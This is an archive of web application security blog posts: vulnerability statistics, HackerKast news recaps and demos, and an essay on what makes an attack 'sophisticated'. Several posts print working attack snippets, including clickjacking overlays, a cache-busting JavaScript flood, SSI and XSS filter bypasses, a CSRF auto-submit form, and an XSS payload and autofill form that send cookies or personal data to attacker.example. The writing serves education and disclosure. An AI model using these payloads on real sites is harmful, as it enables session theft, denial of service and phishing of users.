Category Archives: Web Application Security

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to their extensive collection of vulnerabilities gathered over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the first thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid-2000s. However, one thing that struck me as very odd was that we have been seeing a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are), here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogeneous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, the people who use it are less likely to switch to something new, which means there is less pressure for incumbent code to be replaced and new frameworks are less likely to be adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, thereby obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, with attackers focusing on custom web application code (e.g. your local bank, PayPal, Facebook) rather than open source code used by many websites. Those findings wouldn’t show up in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete, for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves to the point where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their lives more difficult than working with the vendors directly or holding onto their vulnerabilities. The growth of bug bounties, where researchers get paid for disclosing a newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is an interesting trend and should be watched carefully. It could also be a hybrid of several of these issues, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit not expressed in the data above: there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning they involve a remote attacker and there is published exploit code), context-dependent attacks (e.g. tricking a user into clicking a malicious link) are still a leading source of compromise, at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common as, or even more common than, they have ever been. Said another way, compromises are flat or even up, while disclosures of new remotely exploitable web application vulnerabilities are down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13: Zombie POODLE, TCP/UDP Vulnerabilities, Jailed for XSS

This week Robert was keeping warm by his yule log while Jeremiah was freezing in the Boston snow, and I won’t be putting Christmas ornaments in my beard no matter how many of you send me that blog post. To get right into it, we started off by talking about the return of POODLE. For those with short-term memory loss, POODLE was a nasty vulnerability disclosed a few weeks back that affected SSLv3, which is: a) still widely deployed, and b) easy to downgrade somebody’s browser to. The zombie POODLE didn’t go after SSL this time and instead went after TLS 1.2, which is used *everywhere*. The most prominent place that will need patching is all the F5 load balancers using this version of TLS – and that happens to be most of them. Sorry to all of you who lost sleep a few weeks ago, because it is about to happen again this week. Happy Holidays!

Next, if you recall a topic from last week’s episode regarding Google’s alternative to CAPTCHA, well, it appears Robert may be getting a Christmas wish early, and it didn’t take long. Before any of us had even seen it in the wild, Google’s new solution to replace CAPTCHAs was found to be very easily bypassed. The check-box that is supposed to tell whether you are a human or a robot turns out to fall back to a normal CAPTCHA, which is nothing new. If that wasn’t useless enough, it actually introduces a new weakness that didn’t exist before: this check-box is clickjackable! You can gather tons of valid tokens that say you are a human and load them into your botnet or whatever you’d like.
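For anyone who hasn’t seen clickjacking in practice, here is a minimal sketch of how that kind of overlay generally works; the framed widget URL and geometry below are placeholders, not the actual reCAPTCHA embed details:

<!-- Hypothetical clickjacking overlay: the framed URL and sizing are made up -->
<div style="position:relative;width:300px;height:80px;">
  <!-- Decoy button the victim thinks they are clicking -->
  <button style="position:absolute;top:25px;left:25px;">Play video</button>
  <!-- The real checkbox widget, framed invisibly on top of the decoy -->
  <iframe src="https://captcha-widget.example/checkbox"
          style="position:absolute;top:0;left:0;width:300px;height:80px;opacity:0;z-index:10;"
          scrolling="no" frameborder="0"></iframe>
</div>

The victim clicks the decoy, the click lands on the invisible checkbox, and the attacker harvests the resulting “I am human” token.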

Now buckle up and put your splash guards on because this next story blew our minds. A new proposal for the HTTP spec has popped up that would allow a browser to… wait for it… make TCP/UDP requests! Yup, you heard it. We had TCP/UDP and said: “Hey, let’s abstract a layer on top of that, and we’ll call it HTTP.” Now, fast forward to this month and we are saying: “Hey, remember TCP/UDP? Let’s put that on top of HTTP!” I’m picturing Dory from Finding Nemo here. This opens tons of doors to all sorts of attacks behind a firewall via a web browser. Watch the video for a list of ideas from Robert and me about what might be possible if this gets implemented.

Lastly, we have a weird and sad story about somebody ending up in jail for a web “hack.” In Singapore, some unlucky fellow decided to poke around on the Prime Minister’s website. The website had a Google search bar embedded in it that reflected the search text unsanitized and was therefore vulnerable to XSS. He got a laugh out of it, crafted a link with the reflected XSS in it that made the Prime Minister’s site display a Guy Fawkes mask in reference to Anonymous, and sent it around. The thing is, though, the site wasn’t actually defaced and no breach actually occurred. That didn’t stop the local authorities from sending this guy to jail for six months and fining him the equivalent of $34,000. As far as we know he is the first person since Samy on Myspace (who is my hero) to land in jail due to XSS.
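For illustration only, a crafted reflected-XSS link of the kind described tends to look something like this; the domain, parameter, and payload here are invented, not the actual link that was circulated:

http://pmo-search.example.sg/search?q=<script>document.body.innerHTML='<img src="//attacker.example/guy-fawkes.png">'</script>

Anyone who clicks it sees the legitimate site render the attacker’s markup in their own browser, even though nothing on the server was ever changed.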

Keep an eye out for some Bonus Footage this week where Robert and I dig into some JavaScript Flooding attacks with an easy demo!

Resources:
POODLE back to bite TLS connections
The No CAPTCHA Problem
TCP and UDP Socket API
Singapore Hacker Jailed for XSS on Prime Minister’s Office Website

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem not to understand how this works, or even that it’s possible, despite multiple attempts to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find, though, is that heavy database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, for example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests using different parameter/value pairs each time, to bypass caching servers like Varnish. Ultimately, an adversary would never want to run this kind of code directly, because the flood would come from their own IP address. Instead, it is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS payloads at some point.
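The actual FlashFlood script is linked below, but the core cache-busting idea can be sketched in a few lines of JavaScript; the target URL and request count here are placeholders, assuming an endpoint that is expensive to render on a cache miss:

// Illustrative cache-busting flood - not the real FlashFlood code
// Every request carries a unique query string, so a cache like Varnish
// treats it as a miss and passes it through to the application and database.
function flood(target, count) {
  for (var i = 0; i < count; i++) {
    var img = new Image();
    img.src = target + '?cachebuster=' + Date.now() + '_' + i + '_' + Math.random();
  }
}
flood('http://victim.example/search', 1000);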

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid-1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some present-day knowledge about web application security to 20-year-old tech? So I took a look at the message board, WWWBoard. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, there have been a number of vulns found in it over the years – four CVEs in all. But I decided to look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it actually has some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past a Perl regex if you allow nulls. But that second substitution makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit so you had to break it up into two chunks that would be executed together once the page was re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->
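When the board stitches the subject and body back into the archived message page, the stored HTML ends up looking roughly like this (a hypothetical reconstruction, not the script’s exact template):

<!-- hypothetical reconstruction of the archived message page -->
<h2><!--#exec cmd="ls -al" echo='</h2>
<p>' --></p>

Everything between the two fragments gets swallowed up inside the bogus echo='...' attribute, so the server’s SSI parser sees one complete directive.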

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention Matt’s project is on its deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike with SSI, I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page – which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it works on modern browsers more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in long-forgotten but still functional places all over the web. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s really fascinating to see how bad things really were, though, and how little security there really was when the web was in its infancy.

#HackerKast 12: Operation Cleaver, Sony and PayPal Hacks, Google’s Alternative to CAPTCHA

Kicked this week off in the holiday spirit with Robert and Jeremiah hanging out in a festive hotel down in Los Angeles, probably preparing to cause lots of trouble. The first story we touched on was about Operation Cleaver, a report put out by Cylance. This research investigates the movements and threat of one particular pro-Iranian hacking group that has been targeting airports and transportation systems across 16 countries. The claim is that this group has “attained the highest level of system access” across all the countries targeted. The reason we web nerds are interested is that the main front door used to start these hacks points towards SQL injection.

Next, we had to do it: we simply couldn’t do a HackerKast without talking about Sony. This hack is bad. Bad for a lot of people, and as Jeremiah points out, there is a real human aspect to this: tons of real people’s information has been leaked, and that will cause a lot of pain. So far, 40GB of a claimed 100TB of stolen data has been leaked and is available on the Internet via torrents. Robert brings up a good point that, given the business Sony is in, moving around terabytes of data probably isn’t an alarm-ringing event. Another great point we discussed is that this hack required insider access. Even though the end result was bad, this does suggest that Sony is probably doing a pretty good job on their exterior security; otherwise the attackers would’ve taken the path of least resistance there.

Can we get through an episode without talking about a WordPress vulnerability? Please? Anyway, we have another one this week, and it affects 850,000 WordPress sites. The culprit this time is the extremely popular WordPress Download Manager plugin. This plugin is vulnerable to a very blatant Remote Code Execution via a simple POST request. An attacker can craft an HTTP POST request with some PHP code and it gets immediately executed on the server. This would lead to absolute and full compromise of the server running this plugin. Do I even need to mention that the vulnerable function has the name “ajax_exec” in it?
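Purely to illustrate the shape of the attack – the endpoint, action, and parameter names below are invented, not the plugin’s real ones – an RCE-by-POST of this kind generally looks something like the following, shown here as a JavaScript fetch for convenience:

// Hypothetical illustration only: the URL, action, and parameter names are made up
fetch('http://victim.example/wp-admin/admin-ajax.php', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  // The vulnerable handler executes whatever code the attacker names
  body: 'action=hypothetical_download_manager_exec&code=' +
        encodeURIComponent('system("id");')
});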

Robert then took a look at a nasty PayPal hack that was published by an Egyptian researcher this week. The clever attack outlined here used a CSRF vulnerability to bypass the protections in place around changing a user’s password-reset security questions. Security questions are a soft spot in a lot of web applications because they are just as good as a password for getting into an account: answer them correctly and you can simply set a new password. The reason CSRF is so bad on this functionality is that an attacker can force an authenticated user’s browser to reset these questions unbeknownst to them. I then sat back for a moment and let Jeremiah and Robert reminisce about the good ole days when dinosaurs roamed the Internet and CSRF wasn’t even considered a vulnerability.
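To picture the CSRF angle, the attacker’s page just silently submits a request to the security-question endpoint using the victim’s logged-in session. The markup below is a generic sketch with a made-up URL and field names, not PayPal’s actual form:

<!-- Hypothetical auto-submitting CSRF form; endpoint and fields are invented -->
<form id="csrf" action="https://account.victim.example/security-questions" method="POST">
  <input type="hidden" name="question1" value="What was your first pet's name?">
  <input type="hidden" name="answer1" value="attacker-chosen-answer">
</form>
<script>document.getElementById('csrf').submit();</script>

Because the browser attaches the victim’s session cookies automatically, the questions get reset without the victim ever seeing a thing.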

Finally, we talked a bit about the new Google gadget recently released as a bold new alternative to the ever-annoying CAPTCHA. Instead of entering some mess of garbled text, Google is claiming it can detect the difference between a bot and a human with just one click of a checkbox. Robert got visibly angered by this idea (ok, maybe not, but he really doesn’t like it). He does admit that today this idea will work well due to the current heuristics in place for detecting a human. Things like mouse movements, time to click the button, etc., are key pieces of information that differentiate real from fake traffic, and they have been important to Google for the sake of detecting ad fraud for years. The problem is that this has now been released publicly, so any attacker can fuzz it and defeat the heuristics. The rest of the problems with this probably deserve a separate blog post, but to put a bow on it, what Robert is suggesting is that this will raise the bar of bot sophistication – and with that boost in sophistication, non-Google-level heuristics will no longer be able to keep up.

That’s a wrap this week, hope you enjoy watching as much as we enjoy making these episodes!

Resources:
Security Advisory – High Severity– WordPress Download Manager
Hacking PayPal Account with Just a Click
Are you a robot? Introducing ‘No CAPTCHA reCAPTCHA’
Critical networks in US, 15 other nations, completely owned, possibly by Iran
Cylance: Operation Cleaver Report
Why Sony’s Plan to Foil PlayStation-Type Attacks Faltered

#HackerKast 11 Bonus Round: The Latest with Clickjacking!

This week Jeremiah said it was my turn to do a little demo for our bonus video. So I went back and decided to take a look at how Adobe had handled clickjacking in various browsers. My understanding was that they had done two things to prevent attackers from tricking users into granting access to the camera and microphone. The first was that they no longer allow the movie to sit in a 1×1 pixel iframe that would otherwise hide the permissions dialog.

The second was that they prevented the opacity of the Flash movie or surrounding iframe from being changed, so that the dialog couldn’t be obscured from view. So I decided to try it out!

It turns out that hiding it from view using opacity is still allowed in Chrome. Chrome has chosen to use a permissions dialog that comes down from the ribbon to prevent the user from being duped. That is a fairly good defense, and I would even argue that there is nothing exploitable here. But just because something isn’t exploitable doesn’t mean it’s clear to the user what’s going on, so I decided to take a look at how I would social engineer someone into giving me access to their camera and microphone.

So I created a small script that pops open the victim domain (say https://www.google.com/) so that the user can look at the URL bar and see that they are indeed on the correct domain. Popups have long been blocked, but only automatic ones; user-initiated popups are still allowed and “pop” up into an adjacent tab. Because I still have a reference to the popup window from the parent, I can easily send it somewhere other than Google after some time elapses.

At this point I send it to a data: URL, which allows me to inject content onto the page. A little sleight of hand makes the browser look an awful lot like it’s still on Google, which makes this super useful for phishing and other social engineering attacks, though it isn’t necessarily a vuln either. The data: URL basically claims that the charset is “https://www.google.com/” followed by a bunch of spaces, instead of “utf-8” or whatever it would normally be. That makes it look an awful lot like you’re still on Google’s site, but you are in fact seeing content from ha.ckers.org. So yeah, imagine that being a login page instead of a clickjacking page and you’ve got a good idea how an attacker would be most likely to use it.
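Roughly, the trick described above looks like the following; the timings, padding length, and injected content are placeholders, and the real demo lives on ha.ckers.org:

// Sketch of the user-initiated popup plus data: URL swap (illustrative only)
var win;
document.getElementById('bait-link').onclick = function () {
  // User-initiated, so the popup is allowed and opens on the genuine domain
  win = window.open('https://www.google.com/', '_blank');
  // Once the victim has glanced at the URL bar, swap in attacker content
  setTimeout(function () {
    win.location = 'data:text/html;charset=https://www.google.com/' +
      new Array(150).join('%20') + ',<h1>attacker-controlled content</h1>';
  }, 10000);
};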

At that point the user is presented with a semi-opaque Flash movie and asked to click twice (once to instantiate the plugin and once to allow permissions). Typically if I were really doing this I would host it on a domain like “gcams.com” or “g-camz.com” or whatever so that the dialog would look like it’s trying to include content from a related domain.

The user is far more likely to allow Google to have access to the user’s camera and microphone than ha.ckers.org, of course, and this problem is exacerbated by the fact that people are accustomed to sites including tons of other domains and sub-domains of other companies and subsidiaries. In Google’s case, googleusercontent.com, gstatic.com etc… are all such places that people have come to recognize and trust as being part of Google, but the same is true with lots of domains out there.

Anyway, yes, this is probably not a vuln, and after talking with Adobe and Chrome they agree, so don’t expect any sort of fixes from what I can gather. This is just how it works. If you want to check it out you can click here with Chrome to try the demo. I hope you enjoyed the bonus video!

Resources:
Wikipedia: Clickjacking

#HackerKast 11: WordPress XSS Vuln, $90 PlayStation 4s and CryptoPHP Backdoor

Happy Late Thanksgiving everybody! We started out this week going around talking about how thankful we are about browser insecurity, web application security, and the Texas cold front.

The first story we talked about was a new, crazily widespread XSS vulnerability in a WordPress Statistics “plugin” (I put plugin in quotes here because, as of September, 90% of sites had this WP-Statistics plugin installed, and that is down to about 86% at the time of this post). The commenting system here is blatantly vulnerable to XSS, which leaves me confused as to how this took so long to come to light.

The proof of concept the researchers included in their blog post was very nasty, as this is a persistent XSS vulnerability. An attacker can leave a comment on a blog post; when the admin of the WordPress blog goes to approve the comment, the payload steals that admin’s session cookies and sends them to the attacker. Other possibilities include changing the current admin password, adding a new admin account, or using the plugin editor to write your own malicious PHP code and execute it instantly.
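A comment payload for that kind of cookie theft generally looks something like the line below; this is a generic illustration with a placeholder attacker domain, not the researchers’ actual proof of concept:

<script>new Image().src='http://attacker.example/steal?c='+encodeURIComponent(document.cookie);</script>

When the admin’s browser renders the unfiltered comment, the script fires in their authenticated session and ships the cookies off to the attacker.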

Next, we spoke about a clever, less-technical business logic hack against Walmart. People were taking advantage of Walmart’s price-matching policy by standing up fake online storefronts with lower prices. These pages would look legitimate enough but were in no way actual retailers. The most widespread use of this, and the one that caught the attention of the right folks, was people getting PlayStation 4s for $90. Robert was very upset that he only heard about this after Walmart tightened their security controls.

Robert then gave us an overview of a new backdoor malware that is taking advantage of common blog plugins. These attackers were creating legitimate-looking add-ons – near-exact mirrors of WordPress, Joomla, Drupal, etc. plugins and themes. The attack itself is a combination of phishing and malware: they trick the admins of these blogs into installing the near-mirror copies of the plugins, which come bundled with a backdoor called CryptoPHP. The solution here is the hard, age-old problem of deciding where, and whom, to trust when downloading any code you are going to install and execute.

Lastly, Jeremiah didn’t shy away from some shameless self-promotion of a blog post we put out about the characteristics of what makes an attack “sophisticated.” This is an interesting, blood-boiling topic for a few of us who have been around for a while. We see these press releases come out all the time claiming a recent breach was caused by a “sophisticated attack,” only to find out later that it was plain-vanilla SQL injection. Jeremiah decided to step up and try to define what is needed to actually claim a sophisticated attack. This is by no means a complete list, but it is certainly a start, and we welcome any and all feedback.

This week’s bonus footage comes from Robert who walked us through some cool research around clickjacking. Check it out!

Resources:
CryptoPHP Backdoor Hijacks Servers with Malicious Plugins and Themes
Scam Tricks Walmart into Selling $90 PS4s
Death by Comments: WordPress XSS Vuln is Biggest in Years
5 Characteristics of a ‘Sophisticated Attack’

#HackerKast 10 Bonus Round: Live Hack of Browser AutoComplete Function

While we were all recording HackerKast Episode 10 this week, we decided to add a little bonus footage for a bit more technical content instead of just news stories. We mastered the power of screen sharing on our video chat and decided to put it to use.

This week’s bonus footage features Jeremiah diving into the world of browser AutoComplete hacking. This isn’t a new topic by any means, but since us hackers get curious every once in a while, Jeremiah decided to see if this bug was still around.

The premise is simple: you place a form on a website that you control. On that form you ask for the user’s name. When the user begins to type their name, some browsers (Chrome and Safari are featured in the video) will offer the convenience of auto-filling the form. The user doesn’t feel like typing their whole name out and allows the browser to do so. What the user doesn’t see is the rest of the form fields, which are easily rendered invisible with simple CSS and named appropriately to grab the rest of the information out of the AutoFill contacts profile.
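A stripped-down version of such a form might look like the following; the field names and CSS are illustrative, and a real demo would tune them to whatever a given browser’s autofill heuristics expect:

<!-- Hypothetical autofill-harvesting form: only the name field is visible -->
<form action="https://attacker.example/collect" method="POST">
  <input type="text" name="name" autocomplete="name" placeholder="Your name">
  <!-- Pushed off-screen with CSS, but still populated by the browser's autofill -->
  <div style="position:absolute;left:-9999px;">
    <input type="text" name="email" autocomplete="email">
    <input type="text" name="phone" autocomplete="tel">
    <input type="text" name="address" autocomplete="street-address">
  </div>
  <input type="submit" value="Continue">
</form>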

In the video Jeremiah shows how it is possible, with a bit of tomfoolery and JavaScript, to grab things like an unsuspecting user’s phone number, birthday, address, email, etc. just by having them start to type their name and letting AutoFill do the rest. This demo was done on Mac OS X using the latest versions of Safari and Chrome.

Again, not much new and revolutionary but still a scary attack that most users would fall for and be none the wiser as to what is going on.

We have posted the code to this particular hack on ha.ckers.org for anyone interested in testing it out.

Happy Hacking!

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability that was uncovered in the very popular jQuery Validation Plugin. This plugin is widely used as a simple form validator, and the researcher, Sijmen Ruwhof, found the bug in the plugin’s CAPTCHA implementation. The bug was very widespread, with a few Google dorks showing at least 12,000 websites easily identified as using it, and another 300,000 to 1 million websites potentially using it or similar vulnerable code. The piece that was amusing for all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. After doing some digging he found the bug had already been in OSVDB since 2013, with no action taken. After he warned the plugin’s author and published the research publicly, the bug was closed within 17 hours. A nice little case study on full disclosure.

Next, Jeremiah covered the launch of a new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news, since there are a ton of CAs out there already, but what makes Let’s Encrypt interesting is that it is a non-profit, *FREE* certificate authority. The project is backed by the EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers, and it focuses on being free and easy to use in order to lower the barrier to encrypting your web traffic. Robert brings up a good question about browser support: if Microsoft or Google doesn’t support this right away, it really only helps the 20% or so of users on Firefox. The other question is what effect this will have on for-profit certificate authorities.

Now we of course had to mention the blog post that went somewhat viral recently about all the information Google is collecting about you. None of this was terribly surprising to many of us in this industry but was certainly eye-opening for a lot of people out there. You can easily look up their advertising profile on you, which was hilariously inaccurate for me and a few others who were posting their info online (contrary to popular belief I’m not into Reggaeton). However, the creepy one for me was the “Location History” which was *extremely* precise.

These six links hitting the blogosphere had good timing, as Mozilla also announced that they will be switching the default search engine in Firefox to Yahoo. This is HUGE news considering somewhere upwards of 95% of Mozilla’s revenue comes from Google paying to be the default engine. Firefox also still has 20% of browser market share, all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling from a judge in the United States which says that police are allowed to compel people to provide any sort of biometric-based authentication, but not password-based. For example, the judge held that it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone, but still not so for a four-digit PIN. This has all sorts of interesting implications for information security and personal privacy when it comes to law enforcement.

With absolutely no segue, we covered a new story about China, which seems to be one of Robert’s favorite topics. It turns out China released a list of a ton of new websites it has blocked, and one that stood out was Edgecast. Edgecast is particularly interesting because, on its own, it isn’t a website worth noting, but it is a CDN, which means China has blocked all of its customers as well – potentially hundreds of thousands of sites. The comparison was made to blocking Akamai. It will be fascinating to see what the repercussions of this are as we go.

Closed out this week just chatting about some extra precautions we are all taking these days in the modern dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt- It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

5 Characteristics of a ‘Sophisticated’ Attack

When news breaks about a cyber-attack, often the affected company will [ab]use the word ‘sophisticated’ to describe the attack. Immediately upon hearing the word ‘sophisticated,’ many in the InfoSec community roll their eyes because the characterization is viewed as nothing more than hyperbole. The skepticism stems from a long history of incidents in which breach details show that the attacker gained entry using painfully common, even routine, and ultimately defensible methods (e.g. SQL injection, brute force, phishing, password reuse, old and well-known vulnerabilities, etc.).

In cases of spin, the PR team of the breached company uses the word ‘sophisticated’ in an attempt to convey that the company did nothing wrong, that there was nothing they could have done to prevent the breach because the attack was not foreseeable or preventable by traditional means, and that they “take security seriously” — so please don’t sue, stop shopping, or close your accounts.

One factor that allows this deflection to continue is the lack of a documented consensus across InfoSec on what constitutes a ‘sophisticated’ attack. Clearly, some attacks are actually sophisticated – Stuxnet comes to mind in that regard. Not too long ago I took up the cause and asked my Twitter followers, many tens of thousands of them largely in the InfoSec community, what they considered to be a ‘sophisticated’ attack. The tweets received were fairly consistent. I distilled the thoughts down to a set of attack characteristics and have listed them below.

5 Characteristics of a ‘Sophisticated’ Attack:

  1. The adversary knew specifically what application they were going to attack and collected intelligence about their target.
  2. The adversary used the gathered intelligence to attack specific points in their target, and not just a random system on the network.
  3. The adversary bypassed multiple layers of strong defense mechanisms, which may include intrusion prevention systems, encryption, multi-factor authentication, anti-virus software, air-gapped networks, and on and on.
  4. The adversary chained multiple exploits to achieve their full compromise. A zero-day may have been used during the attack, but this alone does not denote sophistication. There must be some clever or unique technique that was used.
  5. If malware was used in the attack, then it had to be malware that would not have been detectable using up-to-date anti-virus, payload recognition, or other endpoint security software.

While improvements can and will be made here, if an attack exhibits most or all of these characteristics, it can be safely considered ‘sophisticated.’ If it does not display these characteristics and your PR team still [ab]uses the word ‘sophisticated,’ then we reserve the right to roll our eyes and call you out.